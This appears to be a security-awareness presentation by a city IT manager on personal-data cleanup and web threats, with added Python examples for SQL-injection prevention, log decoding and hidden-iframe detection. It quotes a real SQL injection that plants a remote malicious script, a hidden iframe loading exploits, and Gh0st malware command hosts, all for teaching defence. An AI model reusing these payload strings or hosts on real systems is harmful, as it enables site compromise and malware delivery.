Steven Narvaez CCIO / ITSD Mgr. City of Deltona East Central Florida District Director FLGISA. 30 years of IT experience
Two-time winner of the Florida Local Government Information Systems Association (FLGISA.org) Technology Achievement Award Program under the category of "Most Innovative Use of Technology Award". FLGISA.ORG: What you need to know! WE ROCK!!!
Do You Really Know Where Your Personal Information Is? • See what information about you is available online • Check out Spokeo and Pipl • Massive amounts of data compiled from a variety of sources, including public records and social networking sites, about individuals. • Can be used by credit issuers, criminal profilers, employers, and others for any number of purposes, not necessarily intended by the data service providers.
Clean up the data you can control • Review your accounts • Three options: • remove the data • modify the privacy settings • request that the account be deleted. If you are going to request that the account be deleted, be sure to first remove all of the data. • Be sure to confirm that the account is deleted versus deactivated.
Request cleanup of data you don't control • Contact site owners. • Can't find owners? • Look it up using the "WHOIS" service for an administrative and technical contact for the site. • A "WHOIS" query can be done by visiting the website http://whois.net/ • Opt out of data service providers.
Request cleanup of data you don't control Data service providers provide lists of contact information to individuals or companies that request it. They often charge a fee for this information. Data service providers allow individuals to opt out of having their data published. Services are aggregators, so the original source provider of the information will also likely have to be contacted to remove your information. The Privacy Rights Clearinghouse publishes the opt-out URL for over 240 of these types of services. Use a professional service. Be aggressive about maintaining a cycle of checking your public data and removing items which don't match your current risk tolerance.
For More Information: Please visit: Privacy Rights Clearinghouse Opt-Out URLs: www.privacyrights.org/online-information-brokers-list · Google support page for removal of data: http://support.google.com/webmasters/bin/answer.py?hl=en&answer=164133&topic=1724262&ctx=topic · IT World Article, "Rescue your Online Reputation": www.itworld.com/it-managementstrategy/212115/seven-ways-rescue-your-online-reputation?page=0,2 · Times Article "How to Fix (or Kill) Web Data About You": www.nytimes.com/2011/04/14/technology/personaltech/14basics.html?_r=0
Threat is real AND it is EVOLVING ALL THE TIME! US Power Co. cyber attacked 10,000 times a month! Could foreign hackers take out America's electric grid? A new congressional report says it's a very real threat, with more than a dozen of nearly 100 electric utilities surveyed reporting constant or frequent cyber attacks, Reuters reports. One utility said it was battered by a staggering 10,000 attacks a month; another reported daily such activity that is "automated and dynamic in nature, able to adapt to what is discovered during its probing process."
China ISP takes internet for a ride • Small Chinese ISP – IDC China Telecommunication briefly hijacked the internet by sending out wrong routing data • Re-transmitted wrong routing data by state-owned China Telecommunications, affected service providers around the world. • The event even made it into the '2010 US-China Economic and Security Review' commission report presented in November of that year to US Congress • For 18 minutes on April 8, China Telecom rerouted 15 percent of the internet's traffic through Chinese servers, affecting US government and military web sites. • Was / Is China testing a cyber attack capability? • China Telecom called the April traffic re-direction an accident.
China at Heart of Sweeping Cyber spying War on US The damage so far could range from $25 billion to $100 billion, or up to 0.5% of GDP, government analysts report. Cyber spying is "just so widespread that it's known to be a national issue at this point," says an Obama administration official. Russia, Israel, and France have also delved into electronic espionage. Chinese officials deny such hacking. The New York Times and Wall Street Journal are among several newspapers to cite recent hacking, the Daily Intelligencer notes.
McAfee's Oopsie McAfee goofs up! Issued a faulty anti-virus update: the now-infamous McAfee DAT file 5958, which wreaked havoc on PCs of countless McAfee customers. Caused malfunctions like the Microsoft 'Blue Screen of Death'. Created the effect of a denial-of-service.
HTTP: A Criminal’s Best Friend Understanding the Problem in Four Parts URL: Recipe for Disaster Web Browser Ecosystem Vulnerable Malware Defeats Anti-Virus Signatures Web Servers Vulnerable
The Web Page: A Security Primer How does a Web Page Work? • HTML: Web site "recipe." Initial HTML retrieval provides the "recipe". Browser then fetches all objects listed in the initial HTML "recipe". • Web Resources: The actual ingredients. Retrieved, per the HTML, from any specified location(s). Includes: • Images • Scripts • Executable objects ("plug-ins") • Other web pages
BoingBoing.net: A popular blog • URLs in browser: 1 • HTTP Gets: 162 • Images: 66 from 18 domains, including 5 separate 1x1 pixel invisible tracking images • Scripts: 87 from 7 domains • Cookies: 118 from 15 domains • 8 Flash objects from 4 domains
Recipe + Ingredients… Let's cook! • Web page HTML is the recipe • Code snippets are website ingredients • The browser will fetch each ingredient • Each ingredient initiates an HTTP transaction
Web Browser Ecosystem Vulnerable • SANS Institute Top 20 Security Risks http://www.sans.org/top20/#c1 • IE and Firefox vulnerable • “…hundreds of vulnerabilities in ActiveX controls installed by software vendors have been discovered.” • Media Players & Browser Helper Objects (BHO) • RealPlayer, iTunes, Flash, QuickTime, Windows Media • Explosion of BHOs and third-party plug-ins • Plug-ins are installed (semi) transparently by website(s). Users unaware an at-risk helper object or plug-in is installed … introducing more avenues for hackers to exploit users visiting malicious web sites.
Malware Defeats Anti-Virus Signatures • Criminals have developed tools to mutate malware to deflect signature-based detection. • At a DefCon hacking conference, teams of researchers proved their success yet again. • Seven viruses and two exploits, all well-known, were mutated to defeat multiple anti-virus engines • Winning time: 2 hours, 25 minutes
Attack Vector: Vulnerable Web Servers SANS Institute Top 20 Security Risks http://www.sans.org/top20/#c1 "Web application vulnerabilities account for almost half the total number of vulnerabilities being discovered in the past year**. These vulnerabilities are being exploited widely to convert trusted web sites into malicious servers serving client-side exploits and phishing scams." ** including open-source and custom-built applications
SQL Injection Attacks • How does the attack work? • Web servers that present dynamic web pages often talk to databases to retrieve the data. • Web servers and databases use a popular language called Structured Query Language (SQL) to describe the data requested. • SQL can also insert new data and update existing data. • If a web server passes unvalidated input from fields on web forms to the database, attackers can take advantage of hacks to issue their own SQL commands. • Those hacks can inject malicious code into the database… • …and the web server will subsequently present this malicious code from the database to unsuspecting users when they visit the website. • The process renders a formerly good website into a malicious one without the knowledge of the site owner or the site's visitors!
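The slide's mechanism (unvalidated form input passed straight into SQL) in runnable form, as an added example that is not part of the original presentation. It uses Python's built-in sqlite3 with a constructed in-memory table standing in for a site's real database; the function names and data are assumptions for illustration. The vulnerable version builds the statement by string concatenation, so a single apostrophe in ordinary input breaks the query (the same "Unclosed quotation mark" error the real log line below records) and crafted input changes what the query returns; the parameterized version binds the input as a value, so it can never be parsed as SQL.

```python
import sqlite3


def make_db():
    """Constructed in-memory database standing in for the site's real one (example data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany(
        "INSERT INTO articles (title, body) VALUES (?, ?)",
        [("Welcome", "Hello visitors"), ("News", "Council meets Tuesday")],
    )
    conn.commit()
    return conn


def search_vulnerable(conn, user_input):
    """The 'before' case: form input is concatenated into the SQL text.

    Whatever the user typed becomes part of the statement, so it can change
    the statement's meaning instead of being treated as a plain value.
    """
    sql = "SELECT title FROM articles WHERE title = '" + user_input + "'"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, user_input):
    """The hardened case: the input is bound as a parameter.

    The database receives the statement and the value separately, so the
    value is compared as data no matter what characters it contains.
    """
    sql = "SELECT title FROM articles WHERE title = ?"
    return [row[0] for row in conn.execute(sql, (user_input,))]


def apostrophe_breaks_query(conn, user_input):
    """True if the concatenated query fails to parse for this input (e.g. O'Brien)."""
    try:
        search_vulnerable(conn, user_input)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("honest lookup, vulnerable:    ", search_vulnerable(db, "News"))
    print("honest lookup, parameterized: ", search_parameterized(db, "News"))
    print("apostrophe breaks concat query:", apostrophe_breaks_query(db, "O'Brien"))
    print("apostrophe with parameters:   ", search_parameterized(db, "O'Brien"))
    print("tautology, vulnerable:        ", search_vulnerable(db, "x' OR '1'='1"))
    print("tautology, parameterized:     ", search_parameterized(db, "x' OR '1'='1"))
```

The tautology input returns every row from the concatenated query and nothing from the parameterized one; the apostrophe input errors in the first and simply finds no match in the second. Parameterization is the fix; input validation on top of it limits what reaches the database at all.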
Real-World SQL Injection HTTP Post made to thousands of web servers 2007-12-30 18:22:46 POST /crappyoutsourcedCMS.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (0x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–178|80040e14|Unclosed_quotation_mark_before_the_character_string_'G;DECLARE_@S_NVARCHAR(4000); SET_@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000'. - 202.101.162.73 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248
SQL Injection Decoded • What that POST is attempting: • …exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://c.uc8010.com/0.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE @T varchar(255)… • Attack inserts script into text fields in database • <script src=http://?.uc8010.com/0.js></script> • Site owner unaware their site was hacked • Site visitors will fetch the malicious script • Script used to deliver any web attack
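The logged POST above hides its SQL inside CAST(0x…) hex so that nothing readable appears in the request. Decoding it is the first step in triage, and it is also a cheap detection: the DECLARE / CAST(0x…) / EXEC pattern has no business in a normal request line. Below is an added example (not code from the presentation) of both steps over a constructed IIS-style log line; the line is modelled on the one above with a placeholder path and a documentation IP address, and its hex is the short NVARCHAR fragment quoted on the slide (which decodes to the start of the statement the next slide shows), not the full payload.

```python
import re
from urllib.parse import unquote_plus

# Constructed log line modelled on the slide's entry (placeholder path and IP).
# The hex is UTF-16LE, the encoding SQL Server uses for NVARCHAR.
SAMPLE_LOG_LINE = (
    "2007-12-30 18:22:46 POST /page.asp;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST("
    "0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000"
    "%20AS%20NVARCHAR(4000));EXEC(@S); - 203.0.113.10 HTTP/1.0 Mozilla/3.0+(compatible;+Indy+Library) - 500 15248"
)

# Constructed benign line for comparison.
BENIGN_LOG_LINE = "2007-12-30 18:22:50 GET /index.asp - 203.0.113.11 HTTP/1.1 Mozilla/5.0 - 200 1024"

# Matches the hex literal handed to CAST(); the request is URL-decoded first so
# that %20 does not split the literal from its surrounding SQL.
HEX_CAST = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)


def decode_hex_payloads(line):
    """Return the decoded SQL hidden inside every CAST(0x...) literal on a log line."""
    decoded = []
    text = unquote_plus(line)
    for match in HEX_CAST.finditer(text):
        hex_digits = match.group(1)
        if len(hex_digits) % 2:          # truncated log lines can leave a stray nibble
            hex_digits = hex_digits[:-1]
        raw = bytes.fromhex(hex_digits)
        try:
            # NVARCHAR payloads are UTF-16LE
            decoded.append(raw.decode("utf-16-le"))
        except UnicodeDecodeError:
            # VARCHAR payloads are single-byte; latin-1 never fails
            decoded.append(raw.decode("latin-1"))
    return decoded


def looks_like_injection(line):
    """Crude detection rule: stacked DECLARE + hex CAST + EXEC in the request line."""
    text = unquote_plus(line).upper()
    return "DECLARE @" in text and "CAST(0X" in text and "EXEC(" in text


if __name__ == "__main__":
    for line in (SAMPLE_LOG_LINE, BENIGN_LOG_LINE):
        print("suspect:", looks_like_injection(line), "decoded:", decode_hex_payloads(line))
```

The decoded fragment reads "DECLARE @T varchar(255),@C ", matching the opening of the cursor statement on the slide. On a real log the rule above would be one of several signals; the HTTP 500 with an "Unclosed quotation mark" error in the original entry is another, since it shows the payload reached the database engine.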
Hacked While Browsing Behind the Scenes
brookeseidl.com registered at eNom 2002 63.249.17.64 hosted at Seattle’s ZipCon with 52 other domains What’s Happening on BrookeSeidl.com • Script injected onto web page – one extra ingredient!
Browser fetches h.js javascript from tejary.net Tejary.net registered 2003 at GoDaddy and hosted on 68.178.160.68 in Arizona Registered by Aljuraid, Mr Nassir A in Saudi Arabia Tejary.net/h.js calls two remote iframe objects What Does Tejary.net/h.js Do?
What Does said7.com Do? Browser fetches /Bb/faq.htm from www.said7.com Said7.com registered 2006 at NAMESECURE.COM Hosted on 74.52.143.60 at ThePlanet, Houston, TX Calls web form from 51yes.com Calls v3i9.cn/c.htm as iFrame <script language="javascript" src="http://count49.51yes.com/click.aspx?id=494953024&logo=11"></script> <iframe src=http://www.v3i9.cn/c.htm width=100 height=0></iframe>
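The "recipe and ingredients" model earlier in the deck (the BoingBoing inventory of scripts, images and domains) and the zero-height iframe just shown are two sides of the same check: list every external resource a page tells the browser to fetch, group it by domain, and flag frames sized to be invisible. The following is an added example, not code from the presentation, using only Python's standard-library HTML parser over a constructed page; the .test domains stand in for the third-party hosts named above and the tag structure copies the script and iframe shown on this slide.

```python
from collections import defaultdict
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed page: one first-party image and script, two third-party scripts,
# and a zero-height third-party iframe laid out like the one on the slide.
SAMPLE_HTML = """
<html><body>
<img src="/images/banner.png">
<script src="/js/site.js"></script>
<script src="http://static.example-scripts.test/h.js"></script>
<script language="javascript" src="http://counter.example-tracker.test/click.aspx?id=1"></script>
<iframe src=http://frames.example-ads.test/c.htm width=100 height=0></iframe>
</body></html>
"""


class ResourceInventory(HTMLParser):
    """Collects every 'ingredient' the HTML recipe asks the browser to fetch."""

    FETCHED_TAGS = ("script", "img", "iframe", "embed")

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.by_domain = defaultdict(list)   # host -> [(tag, url), ...]
        self.hidden_iframes = []             # iframe URLs sized or styled to be invisible

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        src = attrs.get("src")
        if tag not in self.FETCHED_TAGS or not src:
            return
        # Relative URLs resolve to the page's own host
        host = urlparse(src).hostname or self.page_host
        self.by_domain[host].append((tag, src))
        if tag == "iframe" and self._is_hidden(attrs):
            self.hidden_iframes.append(src)

    @staticmethod
    def _is_hidden(attrs):
        zero = ("0", "0px")
        style = (attrs.get("style") or "").replace(" ", "").lower()
        return (attrs.get("width", "").strip() in zero
                or attrs.get("height", "").strip() in zero
                or "display:none" in style
                or "visibility:hidden" in style)


def inventory(html, page_host):
    """Summarise fetched resources: per-domain counts, third-party hosts, hidden frames."""
    parser = ResourceInventory(page_host)
    parser.feed(html)
    counts = {host: len(items) for host, items in parser.by_domain.items()}
    third_party = sorted(host for host in counts if host != page_host)
    return {"counts": counts, "third_party": third_party, "hidden_iframes": parser.hidden_iframes}


if __name__ == "__main__":
    report = inventory(SAMPLE_HTML, "www.example.test")
    for key, value in report.items():
        print(f"{key}: {value}")
```

Run against a site's own pages on a schedule, a jump in the third-party list or any entry in hidden_iframes is exactly the "one extra ingredient" the injected-script slides describe, and it is visible long before an anti-virus signature for the payload exists.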
Exploit Resources Fetched from v3i9.cn It all starts with /c.htm loaded from tejary.net, said7.com Real Player Exploit • /ipp.htm – Real Player exploit CVE-2008-1309; 2/40 anti-virus vendors detect; calls real.html; includes f#!kyoukaspersky • /real.htm, /real.js – Real Player exploit CVE-2007-5601 MDAC (Microsoft Data Access Component) Exploit • /14.htm, /14.js – exploits Exploit-MS06-014 vulnerability in the MDAC functions Flash Exploit • /swfobject.js – detects Flash version and selects the corresponding content • /flash.htm – Flash exploit; 2/40 anti-virus vendors detect • /igg.htm – ??? Called from /flash.htm for exploit?
What is Our Malware? • After successful exploit, malware installed from v3i9.cn • ce.exe = Gh0st malware: keylogging, web cam monitoring • Persistent connection to China: 58.253.68.68 / vobe.3322.org
Anti-Virus Won’t Protect us • Ce.exe analyzed on Virus Total 31% detection on days 1, 2 48% detection on day 3 • 21% detection for SMS.exe
Protection - Prevention “The cost of protecting ourselves against cybercrime can far exceed the cost of the threat itself … [therefore] we should spend less in anticipation of cybercrime and more on catching the perpetrators.” “We distinguish carefully between traditional crimes that are now ‘cyber’ because they are conducted online (such as tax and welfare fraud); transitional crimes whose modus operandi has changed substantially as a result of the move online (such as credit card fraud); new crimes that owe their existence to the Internet; and what we might call platform crimes such as the provision of botnets which facilitate other crimes rather than being used to extract money from victims directly.”
The Cost UK is spending ~$1 billion on efforts to protect against or clean-up after a threat, including $170 million on antivirus measures, but only $15 million is being spent on law enforcement to pursue cyber criminals. Shouldn’t we spend some time on stopping the threat by apprehending the criminals?